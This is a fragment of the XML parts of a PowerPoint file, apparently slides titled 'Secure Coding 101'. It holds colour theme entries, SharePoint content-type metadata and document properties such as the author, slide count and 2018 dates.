      <a:srgbClr val="DC0032"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F47721"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="72A309"/>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FFFFFF"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="0062AA"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="008864"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="698BBD"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="77368A"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="0E9E9E"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="00154D"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="4A2767"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="BB8C61"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="006241"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="015083"/>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A28F0797515914393977AECD33804A2" ma:contentTypeVersion="1" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="1e9e38beef9772ebb441196522c557b1">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7FB32840-3346-459C-A700-36E27D32F3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87777FF-7276-44E2-B797-1AEFE723C1FB}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{01140376-FB0D-46AA-8E0C-0BD6C14FA7B8}">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12613</TotalTime>
  <Words>2658</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>389</Paragraphs>
  <Slides>32</Slides>
  <Notes>22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32</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="36" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>TITLE SLIDES</vt:lpstr>
      <vt:lpstr>CONTENT SLIDES</vt:lpstr>
      <vt:lpstr>Secure Coding</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding</vt:lpstr>
      <vt:lpstr>Quote of the Day</vt:lpstr>
      <vt:lpstr>Secure Coding 101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Debra Wheelwright</dc:creator>
  <cp:lastModifiedBy>Home</cp:lastModifiedBy>
  <cp:revision>478</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-04T22:15:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-10T20:25:33Z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0x010100DA28F0797515914393977AECD33804A2</vt:lpwstr>
  </property>
</Properties>
</file>